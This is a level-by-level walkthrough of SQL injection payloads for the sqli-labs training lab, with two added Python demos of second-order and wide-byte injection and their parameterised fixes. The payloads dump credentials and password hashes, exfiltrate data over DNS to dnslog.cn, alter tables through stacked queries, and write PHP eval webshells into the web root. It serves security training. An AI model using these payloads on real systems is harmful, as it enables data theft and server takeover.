sqli-labs: payloads for every level


Test environment

*****************
*mysql  5.7.26  *
*php    5.5.9nts*
*apache 2.4.39  *
*****************

Less-1 (exploitation walkthrough)

Error-based injection: dumping database data
gtid_subset error
1' and gtid_subset(user(),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(concat(username,':',password)) from security.users)),1) %23
floor error (duplicate-key error from floor(rand(0)*2) in GROUP BY; the source table needs at least three rows, which information_schema.tables always has)
-1'  union select 1,2,count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,0x7e,user())%23
updatexml error (the XPath error message echoes at most 32 characters, so page through long results with substr())
' or updatexml(1,concat(0x7e,database()),1)%23
extractvalue error (same 32-character limit)
' or extractvalue(1,concat(0x7e,database()))%23

UNION-based injection: dumping database data
-1' union select 1,2,3 %23
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23
-1' union select 1,2,group_concat(concat(username,':',password)) from security.users %23

Out-of-band injection: exfiltrating data over DNS
Note: replace yourid with a subdomain obtained from dnslog.cn and read the results there; if nothing shows up, get a new id or retry a few times. This relies on load_file() resolving a UNC path, so it only works when MySQL runs on Windows (as it does under phpstudy).
-1' union select 1,2,load_file(concat('////',(select schema_name from information_schema.schemata limit 0,1),'.yourid.dnslog.cn/abc')) %23
-1' or if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 4,1),'.yourid.dnslog.cn/abc'))),1,0) %23

Show the data directory (with phpstudy this also tells you where the WWW root is)
' union select 1,2,@@datadir %23
Show the database version
-1' union select 1,2,version() %23
Show the hostname of the database server
-1' union select 1,2,@@hostname %23
Show the current database user
-1' union select 1,2,user() %23
List all database users
-1' union select 1,2,group_concat(concat(user,'@',host)) from mysql.user %23
Dump the users' password hashes (crack them offline, e.g. with cmd5)
-1' union SELECT 1,2,group_concat(concat(user,'-',authentication_string)) FROM mysql.user %23
List every privilege per user
-1' union SELECT 1,2,group_concat(concat(grantee,'-',privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES %23
Check whether the current user has the FILE privilege (Y = yes, N = no; replace the user value with the current user)
' or updatexml(1,concat('~file_priv:',(SELECT file_priv FROM mysql.user WHERE user='root' )),1)%23
Check whether MySQL allows file read/write (empty string = unrestricted; NULL = disabled; a directory path = only that directory)
-1' union select 1,2,@@secure_file_priv %23

Read a file (requires the FILE privilege and a path permitted by secure_file_priv)
-1' union select 1,2,load_file('e:/url.txt') %23

Export data (write to a file); dumpfile writes a single row raw, without line terminators or escaping, which is what you want for binary content
-1' union select 1,2,user() into outfile 'e:/demo.txt' %23
-1' union select 1,2,user() into dumpfile 'e:/demo1.txt' %23

Write a one-line PHP webshell to the target (the shell itself contains single quotes, so wrap it in double quotes or use hex, see below)
-1' union select 1,2,"<?php eval($_REQUEST['pass'])?>" into outfile 'F:/phpstudy_pro/WWW/muma.php' %23
1' into outfile 'F:/phpstudy_pro/WWW/muma1.php' lines terminated by "<?php eval($_REQUEST['pass'])?>" %23
1' into outfile 'F:/phpstudy_pro/WWW/muma2.php' lines starting by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma3.php' fields terminated by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma4.php' COLUMNS terminated by "<?php eval($_REQUEST['pass'])?>"%23
Convert the webshell to hex; MySQL decodes a 0x literal back into the string, so no quotes are needed at all
1' into outfile 'F:/phpstudy_pro/WWW/muma5.php' lines terminated by 0x3c3f706870206576616c28245f524551554553545b2770617373275d293f3e %23

Check whether the slow query log is enabled (1 = on, 0 = off)
-1' union select 1,2,@@slow_query_log %23
To enable it, add slow_query_log = ON under [mysqld] in my.ini
If it is on, find the log path (e.g. F:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-SRG99HI-slow.log)
-1' union select 1,2,@@slow_query_log_file %23
The slow log records statements that run longer than long_query_time (10 seconds by default), so send a statement that sleeps for 10 seconds and carries the webshell
-1' union select 1,sleep(10),"<?php eval($_REQUEST['pass'])?>" %23
Then copy the log into the WWW root so a webshell client can reach it
-1' union select 1,2,load_file('F:/phpstudy_pro/Extensions/MySQL5.7.26/data/DESKTOP-SRG99HI-slow.log') into outfile "F:/phpstudy_pro/WWW/muma6.php" %23


Less-2

1 or gtid_subset(user(),1)
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)

Less-3

1') or gtid_subset(user(),1)%23
1') and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23

Less-4

1") or gtid_subset(user(),1)%23

Less-5

1' or gtid_subset(user(),1)%23

Less-6

1" or gtid_subset(user(),1)%23

Less-7

-1')) union select 1,2,user() into outfile 'e:/demo.txt' %23

Less-8

' or ascii(substr(database(),1,1))>97 %23
' or ascii(substr(database(),1,1))=115 %23

Less-9

' or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
' or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23

Less-10

" or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
" or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23

Less-11

Less-11 to Less-17: intercept the POST with Burp Suite and edit the request body

uname=1' or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-12

uname=1") or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-13

uname=1') or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-14

uname=1" or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-15

uname=' or ascii(substr(database(),1,1))=114 %23&passwd=12&submit=Submit
uname=' or ascii(substr(database(),1,1))=115 %23&passwd=12&submit=Submit

Less-16

uname=") or if(ascii(substr(database(),1,1))=114,sleep(2),1)%23&passwd=12&submit=Submit
uname=") or if(ascii(substr(database(),1,1))=115,sleep(2),1)%23&passwd=12&submit=Submit

Less-17

uname=admin&passwd=1' and gtid_subset(user(),1)%23&submit=Submit

Less-18

User-Agent injection
The username and password must be valid; intercept the request and edit the User-Agent header

User-Agent: ' or gtid_subset(user(),1) or '

Less-19

Referer injection
The username and password must be valid; intercept the request and edit the Referer header

Referer: ' or gtid_subset(user(),1) or '

Less-20

Cookie injection
The username and password must be valid; intercept the second request and edit the Cookie header

Cookie: uname=' or gtid_subset(user(),1)%23

Less-21

Cookie injection
The username and password must be valid; intercept the second request and edit the Cookie header; the cookie value must be base64-encoded

Before encoding: ') or gtid_subset(user(),1)#  After encoding: Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Cookie: uname=Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==

Less-22

Cookie injection
The username and password must be valid; intercept the second request and edit the Cookie header; the cookie value must be base64-encoded

Before encoding: " or gtid_subset(user(),1)#  After encoding: IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Cookie: uname=IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj

Less-23

# and -- are filtered; instead of commenting out the tail, close the quote so the query stays valid (in the last payload the application's own trailing quote closes the string '3')

' or gtid_subset(user(),1) or '
' union select 1,user(),3 or '
' union select 1,user(),'3

Less-24

Second-order injection

1. Register a user test with password asd
2. Pretend that user test has forgotten the password
3. Register a user test'# with password 123
4. Log in as test'# and change the password to admin
5. The database executes UPDATE users SET PASSWORD='admin' where username='test'#' and password='123'
6. The username was escaped when it was stored but is reused unescaped from the session, so instead of changing the password of test'# you change the password of test
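Added example (not from the walkthrough or from sqli-labs): the Less-24 flow reproduced in Python against an in-memory SQLite database, beside the parameterised fix. Assumptions: SQLite stands in for MySQL, so the attacker's username ends in SQLite's -- comment marker rather than #, and quotes are escaped by doubling rather than with a backslash; the table, usernames and passwords are constructed to match the six steps above.

```python
import sqlite3

# Constructed stand-in for the lab's users table, run in SQLite so it works
# offline. SQLite has no '#' comment, so the attacker's username ends in '--'
# (SQLite's comment marker); the effect on the UPDATE is the same.


def sql_escape(value: str) -> str:
    """Input-time escaping (the role mysql_real_escape_string plays in the lab).
    SQLite doubles single quotes instead of backslash-escaping them."""
    return value.replace("'", "''")


def setup() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # Escaped at registration, so the quote in "test'--" is stored intact.
    con.execute(
        "INSERT INTO users(username, password) VALUES('%s', '%s')"
        % (sql_escape(username), sql_escape(password))
    )


def change_password_vulnerable(con, session_username: str, old: str, new: str) -> str:
    """Less-24 pattern: the username comes back out of the session/database and
    is trusted, so it is concatenated without escaping. Returns the SQL sent."""
    sql = "UPDATE users SET password='%s' WHERE username='%s' AND password='%s'" % (
        sql_escape(new), session_username, sql_escape(old))
    con.execute(sql)
    return sql


def change_password_fixed(con, session_username: str, old: str, new: str) -> None:
    """Bind every value whatever its origin; stored data is still untrusted."""
    con.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                (new, session_username, old))


def password_of(con, username: str):
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def demo(fixed: bool = False) -> tuple:
    """Returns (victim's password, attacker's password) after the reset."""
    con = setup()
    register(con, "test", "asd")       # victim (step 1)
    register(con, "test'--", "123")    # attacker (step 3)
    if fixed:
        change_password_fixed(con, "test'--", "123", "admin")
    else:
        change_password_vulnerable(con, "test'--", "123", "admin")
    return password_of(con, "test"), password_of(con, "test'--")


if __name__ == "__main__":
    print(demo())            # vulnerable: the victim's password is now 'admin'
    print(demo(fixed=True))  # fixed: only the attacker's own row changes
```

The escaping at the boundary protects the INSERT; the later UPDATE rebuilds its query from stored data, which is why every statement needs bound parameters, not just the one that first receives user input.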

Less-25

and/or are filtered: double-write the keyword or use the && / || operators (URL-encoded)

' oorr gtid_subset(user(),1)%23
' aandnd gtid_subset(user(),1)%23
' %26%26 gtid_subset(user(),1)%23
' %7c%7c gtid_subset(user(),1)%23

Less-25a

and/or are filtered (numeric parameter): double-write the keyword

-1 oorr ascii(substr(database(),1,1))=114
-1 oorr ascii(substr(database(),1,1))=115

Less-26

Filters and, or, #, --, /*, whitespace (\s) and backslash; use || and && with no spaces and close the quote

'||gtid_subset(user(),1)||'
'%26%26gtid_subset(database(),1)%26%26'

Less-26a

Filters and, or, #, --, /*, whitespace (\s) and backslash (boolean-based blind version)

'||ascii(substr(database(),1,1))=114||'
'||ascii(substr(database(),1,1))=115||'

Less-27

Filters union, select, and, or, #, --, /* and spaces: vary the keyword case and use %0a (newline) in place of spaces

'%0aUnIoN%0aSeLeCT%0a1,user(),3||'
'||gtid_subset(concat(0x7e,(SeLeCT%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)||'

Less-27a

Filters union, select, and, or, #, --, /* and spaces (double-quote version)

"%0aUnIoN%0aSeLeCT%0a1,user(),3||"

Less-28

Filters the sequence union select, plus #, --, /* and spaces; the filter runs once, so nest the sequence inside itself and what remains after removal is a valid union select

')%0auunion%0aselectnion%0aselect%0a1,user(),3||('

Less-28a

Filters union select; same nested-keyword trick

')%0auunion%0aselectnion%0aselect%0a1,user(),3||('

Less-29

Whitelist bypass
The level is in login.php, not index.php
Use HTTP parameter pollution: the front-end check validates only the first id value and never looks at the second, which is the one the query uses

http://192.168.31.242/sqli-labs/Less-29/login.php?id=1&id=-1' union select 1,2,database() --+

Less-30

Whitelist bypass
The level is in login.php, not index.php
HTTP parameter pollution
The front-end check validates only the first id value and never looks at the second

http://192.168.31.242/sqli-labs/Less-30/login.php?id=1&id=-1" union select 1,2,database() --+

Less-31

Whitelist bypass
The level is in login.php, not index.php
HTTP parameter pollution
The front-end check validates only the first id value and never looks at the second

http://192.168.31.242/sqli-labs/Less-31/login.php?id=1&id=-1") union select 1,2,database() --+

Less-32

Wide-byte (GBK) injection to defeat escaping

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23

0x70696b61636875 is pikachu in hex (a database present on the test box)
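Added example, not from the walkthrough or from sqli-labs: a byte-level simulation of why -1%df' gets past addslashes() when the connection character set is GBK, and why it does not on UTF-8. It implements only the GBK and UTF-8 lead/trail byte rules (no codec) plus a PHP-style addslashes(); the input bytes are constructed.

```python
# Byte-level model of the wide-byte bypass used in Less-32 to Less-37.
# Constructed example; it uses no charset codec, only the byte-range rules.


def php_addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP addslashes(): a backslash (0x5c) goes in
    front of ' " and \\ with no idea which bytes form one character."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def gbk_tokens(data: bytes) -> list:
    """Group bytes the way a GBK connection makes MySQL's parser see them: a
    lead byte 0x81-0xFE followed by a trail byte 0x40-0xFE (except 0x7F) is
    one two-byte character, so 0xDF 0x5C becomes a single CJK character."""
    tokens, i = [], 0
    while i < len(data):
        b = data[i]
        nxt = data[i + 1] if i + 1 < len(data) else None
        if 0x81 <= b <= 0xFE and nxt is not None and 0x40 <= nxt <= 0xFE and nxt != 0x7F:
            tokens.append(data[i:i + 2])
            i += 2
        else:
            tokens.append(data[i:i + 1])
            i += 1
    return tokens


def utf8_tokens(data: bytes) -> list:
    """Same grouping for a utf8/utf8mb4 connection: 0xDF needs a continuation
    byte 0x80-0xBF, and 0x5C is not one, so the backslash stays a backslash."""
    tokens, i = [], 0
    while i < len(data):
        b = data[i]
        n = 2 if 0xC2 <= b <= 0xDF else 3 if 0xE0 <= b <= 0xEF else 4 if 0xF0 <= b <= 0xF4 else 1
        chunk = data[i:i + n]
        if n > 1 and len(chunk) == n and all(0x80 <= c <= 0xBF for c in chunk[1:]):
            tokens.append(chunk)
            i += n
        else:
            tokens.append(data[i:i + 1])
            i += 1
    return tokens


def quote_escapes_string(user_input: bytes, charset: str = "gbk") -> bool:
    """Run the input through addslashes, then walk it as the parser would for
    the given connection charset. True if an unescaped ' reaches the parser,
    i.e. the injection breaks out of the string literal."""
    tokenize = gbk_tokens if charset == "gbk" else utf8_tokens
    tokens = tokenize(php_addslashes(user_input))
    i = 0
    while i < len(tokens):
        if tokens[i] == b"\\":
            i += 2            # the backslash escapes whatever follows it
            continue
        if tokens[i] == b"'":
            return True
        i += 1
    return False


if __name__ == "__main__":
    payload = b"-1\xdf'"      # URL-decoded form of -1%df'
    print(php_addslashes(payload).hex())              # 2d31df5c27
    print(quote_escapes_string(b"-1'", "gbk"))        # False: \' is still escaped
    print(quote_escapes_string(payload, "gbk"))       # True: \xdf swallows the backslash
    print(quote_escapes_string(payload, "utf8"))      # False: no wide byte in UTF-8
```

Parameterised queries or a consistent utf8mb4 connection close this gap; escaping alone cannot, because addslashes() never learns which bytes belong together.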

Less-33

Wide-byte (GBK) injection to defeat escaping

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23

Less-34

Wide-byte (GBK) injection to defeat escaping
Intercept the POST with Burp Suite and edit the request body

uname=12&passwd=12%df' or gtid_subset(user(),1) %23&submit=Submit

Less-35

Escaping with a numeric parameter: the id is not quoted, so the escaping has nothing to act on and no wide byte is needed

1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
List the tables of pikachu
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875)),1)

Less-36

Wide-byte (GBK) injection to defeat escaping

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23

Less-37

Wide-byte (GBK) injection to defeat escaping
Intercept the POST with Burp Suite and edit the request body

uname=-1%df' union select 2,group_concat(schema_name) from information_schema.schemata%23&passwd=12&submit=Submit

Less-38

Stacked queries; first use UNION injection to learn the database, table and column names

1';create database abc;
-1';insert into users values(17,'test2','0');
-1';delete from users where username='test2';
-1';update users set password='123' where username='Dumb';

Less-39

Stacked queries

-1;insert into users values(18,'test3','0');

Less-40

Stacked queries

-1');insert into users values(19,'test4','0');

Less-41

Stacked queries

1;insert into users values(20,'test5','0');

Less-42

Stacked queries
Intercept the POST with Burp Suite and edit the request body

login_user=11&login_password=-1';insert into users values(21,'test5','0');&mysubmit=Login

(this creates a new user test5 with password 0)

Less-43

Stacked queries are not needed here
Intercept the POST with Burp Suite and edit the request body

login_user=11&login_password=1') or gtid_subset(user(),1) %23&mysubmit=Login

Less-44

Stacked queries
Intercept the POST with Burp Suite and edit the request body

login_user=11&login_password=1';insert into users values(22,'test6','0');&mysubmit=Login

Less-45

Stacked queries
Intercept the POST with Burp Suite and edit the request body

login_user=11&login_password=1');insert into users values(23,'test6','0');&mysubmit=Login

Less-46

ORDER BY injection
Error-based

updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))

Time-based blind (note the branches are swapped: the request sleeps when the guess is wrong)

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

Write a one-line webshell

1 INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e

Less-47

ORDER BY injection

1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23

Write a webshell

1' INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e %23

Less-48

ORDER BY injection
Time-based blind (sleeps when the guess is wrong)

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

Less-49

ORDER BY injection
Time-based blind (sleeps when the guess is wrong)

1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23

Less-50

ORDER BY injection
Error-based

updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))

Stacked queries also work here, see Less-38

Less-51

ORDER BY injection

1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23

Stacked queries also work here, see Less-38

Less-52

ORDER BY injection
Time-based blind (sleeps when the guess is wrong)

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

Stacked queries also work here, see Less-38

Less-53

ORDER BY injection
Time-based blind (sleeps when the guess is wrong)

1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23

Stacked queries also work here, see Less-38

Less-54

The objective of this challenge is to dump the secret key from the random table in the challenges database in fewer than 10 attempts. For fun, every reset regenerates the table name, column names and data, so the values in [] must be replaced with what you find

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Found table name: nvw9mo2tqp
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='[nvw9mo2tqp]' %23
Found columns: id,sessid,secret_CJZ0,tryy
-1' union select 1,2,group_concat(concat(sessid,':',[secret_CJZ0])) from challenges.[nvw9mo2tqp] %23
Submit the value after the colon to clear the level

Less-55

First click Reset the Challenge! to reset the database; the method is the same as Less-54

-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Found table name: wchcrmmhzw
-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wchcrmmhzw' %23
Found columns: id,sessid,secret_CDNC,tryy
-1) union select 1,2,group_concat(concat(sessid,':',secret_CDNC)) from challenges.wchcrmmhzw %23
Submit the value after the colon to clear the level

Less-56

First click Reset the Challenge! to reset the database; the method is the same as Less-54

-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Found table name: u4w32ptczx
-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='u4w32ptczx' %23
Found columns: id,sessid,secret_SADN,tryy
-1') union select 1,2,group_concat(concat(sessid,':',secret_SADN)) from challenges.u4w32ptczx %23
Submit the value after the colon to clear the level

Less-57

First click Reset the Challenge! to reset the database; the method is the same as Less-54

-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Found table name: kktpgr0pk2
-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kktpgr0pk2' %23
Found columns: id,sessid,secret_533C,tryy
-1" union select 1,2,group_concat(concat(sessid,':',secret_533C)) from challenges.kktpgr0pk2 %23
Submit the value after the colon to clear the level

Less-58

First click Reset the Challenge! to reset the database; this level needs error-based injection

1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Found table name: ub4yi19a96
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ub4yi19a96')),1) %23
Found columns: id,sessid,secret_I3Z9,tryy
1' and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_I3Z9)) from challenges.ub4yi19a96)),1) %23
Submit the value after the colon to clear the level

Less-59

First click Reset the Challenge! to reset the database; this level needs error-based injection

1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)
Found table name: 6dwnu523h0
1 and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6dwnu523h0')),1)
Found columns: id,sessid,secret_R6HL,tryy
1 and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_R6HL)) from challenges.6dwnu523h0)),1)
Submit the value after the colon to clear the level

Less-60

First click Reset the Challenge! to reset the database; this level needs error-based injection

1") and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Found table name: 8zl4ya4h4y
1") and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8zl4ya4h4y')),1) %23
Found columns: id,sessid,secret_XWZV,tryy
1") and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_XWZV)) from challenges.8zl4ya4h4y)),1)%23
Submit the value after the colon to clear the level

Less-61

First click Reset the Challenge! to reset the database; this level needs error-based injection

1')) and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Found table name: vt3n10iqbm
1')) and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vt3n10iqbm')),1) %23
Found columns: id,sessid,secret_JX4B,tryy
1')) and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_JX4B)) from challenges.vt3n10iqbm)),1)%23
Submit the value after the colon to clear the level

Less-62

First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection

') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>100 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=102 %23
The first letter of the table name is f
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>103 %23
Continue the same way for the second letter and the rest of the name
Once the table name is known, guess the columns (replace {} with the table name found)
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>97%23
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>110%23
Once the columns are known, guess the records (replace col and tb_name with the column and table found)
') or ascii(substr((select group_concat(col)from challenges.tb_name),1,1))>97%23


Doing this by hand is far too tedious, so I wrote a script:
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-63

First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62, only the way the payload closes the query differs

' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=103 %23

Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-64

First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62, only the way the payload closes the query differs

1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23

Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-65

First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62, only the way the payload closes the query differs

1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23

Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470
